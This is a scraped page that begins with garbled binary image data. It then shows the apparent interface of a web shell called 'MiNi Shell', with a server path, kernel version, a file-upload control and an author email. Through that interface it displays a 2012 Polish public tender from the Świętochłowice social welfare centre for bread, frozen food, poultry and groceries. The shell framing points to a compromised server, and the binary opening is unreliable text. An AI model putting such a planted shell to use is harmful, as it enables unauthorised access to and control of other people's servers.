JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121016/399790-N-2012.html

<p class="kh_header"><b>Świętochłowice: Dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej na potrzeby żywienia w placówkach podległych w podziale na 4 pakiety</b><br>
<b>Numer ogłoszenia: 399790 - 2012; data zamieszczenia: 16.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Katowicka 35, 41-600 Świętochłowice, woj. śląskie, tel. 032 2455104, faks 032 2455104.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.ops.swietochlowice.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej na potrzeby żywienia w placówkach podległych w podziale na 4 pakiety.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej  na potrzeby żywienia w placówkach podległych wraz z dostawą i rozładunkiem  w  magazynach Ośrodka Pomocy Społecznej w Świętochłowicach : 
Ośrodki Wsparcia - ul. Imieli 12,
Środowiskowy Dom Samopomocy-  ul. Karpacka 3.
2.	Przykładowy asortyment przedmiotu zamówienia określa załącznik nr 2 do niniejszej SIWZ - tabela
kosztów w zakresie każdego z 4 pakietów. Ilości artykułów podane w tabelach posiadają wartość szacunkową i będą uzależnione od aktualnych potrzeb Zamawiającego.
3.	Dostawy realizowane będą na podstawie zamówienia pisemnego przesyłanego faksem lub składanego telefonicznie w każdym następnym dniu po zgłoszeniu zamówienia lub w innym terminie uzgodnionym z Wykonawcą, w dni powszednie od poniedziałku do piątku w  godzinach od 07:00 do 15:00. 
4.	Wykonawca zobowiązany będzie do bezpłatnego dowozu towaru transportem spełniającym wymagania sanitarne oraz rozładunku wraz z wniesieniem do  magazynów  określonych w ust 1. niniejszego paragrafu.  
5.	Wykonawca  zobowiązany będzie dostarczać zamawiany towar bezwzględnie w dni wyznaczone przez Zamawiającego.
6.	Wykonawca zobowiązany będzie dostarczyć towar I klasy jakości, świeży, spełniający normy jakościowe (PN) dla danego asortymentu, wysokiej jakości sensorycznej i mikrobiologicznej.
7.	Każdy produkt musi być dopuszczony do obrotu i sprzedaży zgodnie z obowiązującymi  przepisami, oraz z warunkami określonymi w SIWZ, musi  posiadać początkowy  termin przydatności do spożycia.
8.	Wykonawca zabezpieczy należycie towar na czas przewozu (opakowania, pojemniki przystosowane do przewozu danego asortymentu) i ponosi całkowitą odpowiedzialność za dostawę i jakość dostarczonego towaru.
9.	Wykonawca weźmie na siebie odpowiedzialność za braki i wady powstałe w czasie transportu oraz poniesie z tego tytułu wszelkie skutki prawne.
10.	Przedmiot umowy Wykonawca zobowiązany jest wykonać zgodnie ze wzorem umowy ( załącznik nr 4 do SIWZ ) oraz SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.22.00.00-6, 15.20.00.00-0, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops.swietochlowice.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętochłowice, ul. Katowicka 35, pokój 304.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2012 godzina 09:00, miejsce: Świętochłowice, ul. Katowicka 35, pokój 304.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa chleba, wyrobów piekarniczych i cukierniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Batony 350g	szt.	2000		
2.		Bułka tarta	kg	40		
3.		Bułki mleczne 80g 	szt.	      1865		
4.		Bułki pszenne duże 100g 	szt.	    22600		
5.		Bułki pszenne małe 45g 	szt.	400		
6.		Chałka 300g	szt.	3		
7.		Chleb 1000 g mieszany 	szt.	    32600		
8.		Chleb razowy 500g	szt.	540		
9.		Rogale 80g	szt.	     2290		
10.		Babki różne smaki 400 g	szt.	20		
11.	Baranki świąteczne 450 g	szt.	30		
12.	Ciasto jogurtowe	kg	20		
13.	Ciasto z jabłkiem	kg	30		
14..	Ciasto z posypką 	kg	20		
15.	Drożdżówki różne smaki 80 g	szt.	300		
16. 	Paczki z nadzieniem 80 g	szt.	800		
17. 	Sernik 	kg	  3		
18. 	Strucla z makiem	kg	45		
19.	Tort śmietankowy 2000 g	szt.	  1		
20.	Ciastka W-Z	szt.	140.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aronia	kg	100	
Czarna porzeczka 	kg	750	
Fasolka szparagowa	kg	380	
Groszek zielony	kg	30	
Marchew	kg	 10	
Zupa jarzynowa - paczka 
 900 g	szt	          10	
Mieszanka jarzynowa - włoszczyzna paski wieloskładnikowa 	kg	      5000	
Mieszanka z brokułami	kg	300	
Kluski śląskie - paczka 500 g	szt	          10	
Pyzy z mięsem- paczka 500 g	szt	          10	
Pierogi z serem F. Alexpon 
lub równoważne 	kg	 10	
Pierogi z truskawkami F. Alexpon lub równoważne 	kg	30	
Szpinak brykiety	kg	450	
Truskawki	kg	 20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa drobiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z indyka	kg	  5
Filet z kurczaka	kg	320
Gulasz drobiowy	kg	100
Gulasz z indyka	kg	400
Kurczak świeży	kg	950
Udziec z indyka	kg	 80
Udka z kurczaka	kg	 15
Porcje rosołowe z kurczaka	kg	 130
Wątróbka drobiowa z kurczaka	kg	 180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa pozostałej żywności.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas w puszce 580g	szt.	330	
Brzoskwinie w puszce g	szt.	360	
Zupy w proszku - barszcz biały 
- 36 g	szt. 	 30	
Budyń 40g różne smaki 
Winiary, Gellwe lub równoważne	szt.	     1070	
Bigos w słoiku -500 g	szt	10	
Chipsy 250g	szt.	 20	
Chrzan tarty 160g	szt.	300	
Cukier 1 kg	kg	      2410	
Cukier puder	kg	         10	
Deser  190g różne smaki  
Gerber lub równoważne	szt.	 10	
Dżemiki jednorazowe 25g	szt.	 20	
Fasolka po bretońsku  w słoiku 
- 500 g	szt	40	
Galaretka 75g różne smaki
Winiary, Gellwe lub równoważne	szt.	700	
Kawa zbożowa 500g	szt.	 90	
Ketchup łagodny 500g	szt.	 120	
Kisiel 75g  różne smaki  Winiary, Gellwe, lub równoważne	szt.	  10	
Kleik ryżowy180 g Bobovita 	szt.	  30	
Kokos wiórki 	kg	  3	
Kremy różne do tortów 120g	szt.	 20	
Kukurydza   w puszce 200 g	szt.	160	
Klopsy wieprzowe w sosie pomidorowym  w słoiku - 500 g	szt	10	
Dżem różne smaki 260 g	szt.	700	
Maggi w płynie 1l, Winiary, Delikat  lub równoważne	szt.	130	
Majeranek luzem	kg.	  8	
Mąka ziemniaczana opak  1 kg	kg	150	
Miodziki jednorazowe 25g	szt.	  30	
Miód prawdziwy 400g	szt.	   5	
Ogórki konserwowe - ok. 
1000 ml - Rolnik lub równoważne 	szt.	   30	
Morele suszone	kg	   4	
Paluszki słone opak. 100g	szt.	  30	
Proszek do pieczenia 16g 
Gellwe lub równoważne	szt.	  30	
Przecier pomidorowy 30% 1780 g
Dawtona, Rolnik lub równoważne	szt.	300	
Przyprawa korzenna 25g 
Prymat lub równoważne	szt.	 5	
Przyprawa do drobiu 	kg	3	
Przyprawa1000g Kucharek, Warzywko lub równoważne	szt.	700	
Rodzynki luzem	kg	  5	
Sok cytrynowy - 1 l	szt.	360	
Śliwka suszona	kg	  5	
Jabłko suszone 	kg	  5	
Syrop malinowy 500g 
Cymes lub równoważne 	szt.	 230	
Śmietana  w proszku  55g
Śnieżka lub równoważne	szt.	  30	
Śmietanka 80g 
Cremona lub równoważne	szt.	100	
Kostka rosołowa ( opk. 6 x 36 g)
Winiary lub równoważne	szt.	50	
Żelatyna wieprzowa 50g	szt.	 30	
Kluski na parze - Buchty 300g	szt.	 15	
Kaszki różne 250g 
Bobovita lub równoważne	szt.	          5	
Chrupki 250 g	szt.	 30	
Fasola biała w opakowaniach 
5 kg lub 10 kg 	kg	170	
Groch łuskany w opakowaniach
 5 kg  lub 10 kg	kg	200	
Kasza gryczana prażona	kg	 80	
Kasza jęczmienna średnia 	kg	 400	
Kasza manna z Młyna w Stoisławiu 	kg 	300	
Fasola kolorowa w opakowaniach 5 kg lub 10 kg 	kg	120	
Kasza manna z Młyna w Stoisławiu lub równoważne	kg	300	
Konserwy turystyczne małe 130 g	szt.	2000	
Mak luzem	kg	30	
Makaron cienki nitki	kg	150	
Makaron gruby: kolanka, muszelki	kg	500	
Mąka pszenna typ 450 opakowanie 1 kg 	kg	1000	
Mąka razowa  z otrębami 	kg	120	
Miód sztuczny 370g	szt.	  5	
Olej uniwersalny 3 l	szt.	135	
Orzechy włoskie łuskane	kg	   1	
Pasztety drobiowe w puszce 160g Drop lub równoważne	szt.	     2200	
Płatki owsiane górskie 500g	kg	130	
Ryż 1 kg	kg	430	
Soczki małe 0,2 l  w kartonikach -różne smaki	szt.	80	
Spody do tortów 400g	szt.	 10	
Śmietana fix w proszku 	szt.	 30	
Sos do spaghetti - w proszku 	szt.	 10	
Sucharki 450 g	szt.	 50	
Zupy w proszku - grochowa 	kg	10	
Aromaty do ciast - 10g	szt.	10	
Wafelki  ok. 37g -  Princessa, 
Prince polo lub równoważne	szt.	     1300	
Batony czekoladowe  Mars, Danusia, Snickers, Maciek, Ikar
lub równoważne	szt.	     1000	
Ciastka biszkopty luzem	kg	  5	
Ciastka czekoladowe - delicje lub równoważne 	kg	  15	
Ciastka kruche różne luzem	kg	  90	
Cukier waniliowy  ok. 16g 
Gellwe lub równoważny	szt.	  100	
Cukierki  landrynki 
 100 g- paczka 	opak.	  10	
Cukierki  zwykłe	kg	  15	
Cynamon 20 g	szt.	 15	
Cukierki czekoladowe 
Michałki, Marcepanowe  lub równoważne 	kg	  30	
Czekolada dla cukrzyków 100g	szt.	  20	
Czekolada mleczna 100 g
Terravita, Wedel lub równoważne	szt.	1200	
Wafle ryżowe 160 g	szt.	 30	
Drożdże 100g	szt.	  10	
Gałka muszkatołowa 100 g	szt.	  50	
Herbata ekspresowa - 100 szt. 
Saga, Minutka  lub równoważne	opak.	 120	
Herbata granulowana  - 80g
Indyjska lub równoważne	opak.	      1300	
Herbata ziołowa - mięta, melisa 
20 saszetek  po 1,2 g 	opak.	         10	
Kakao 100 g Decomoreno 
Wawel lub równoważne	opak.	         80	
Kawa naturalna 100g
Prima, Gala  lub równoważne	szt.	600	
Kawa rozpuszczalna  100 g
Nescafe lub równoważne	szt.	150	
Kawa naturalna 250g
MK  lub równoważne	szt.	100	
Kminek mielony 	kg	6	
Kolendra 20 g 	szt.	 50	
Krem czekoladowy 350 g
Nutella lub równoważne 	szt.	 150	
Kasza gryczana ( 4x100 g)	szt.	 10	
Liść laurowy luzem	kg	 2	
Musztarda łagodna 180 g
Rolnik lub równoważne	szt.	230	
Musztarda ostra 180 g
Rolnik lub równoważne	szt.	200	
Ocet spirytusowy 1 l	szt.	 220	
Papryka w proszku łagodna luzem Prymat lub równoważne	kg	4	
Pieprz czarny mielony luzem	kg	6	
Pieprz ziołowy luzem	kg	6	
Pierniki lukrowane luzem	kg	50	
Pierniki w czekoladzie luzem	kg	 60	
Ryż ( 5x100 g)	szt.	 10	
Soda oczyszczona - 15 g	szt.	 10	
Soki w kartonach 1 l różne smaki	szt.	30	
Sól  w opakowaniach 1 kg	kg	       700	
Woda niegazowana - 1,5 l	szt.	250	
Ziele angielskie luzem	kg	          6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com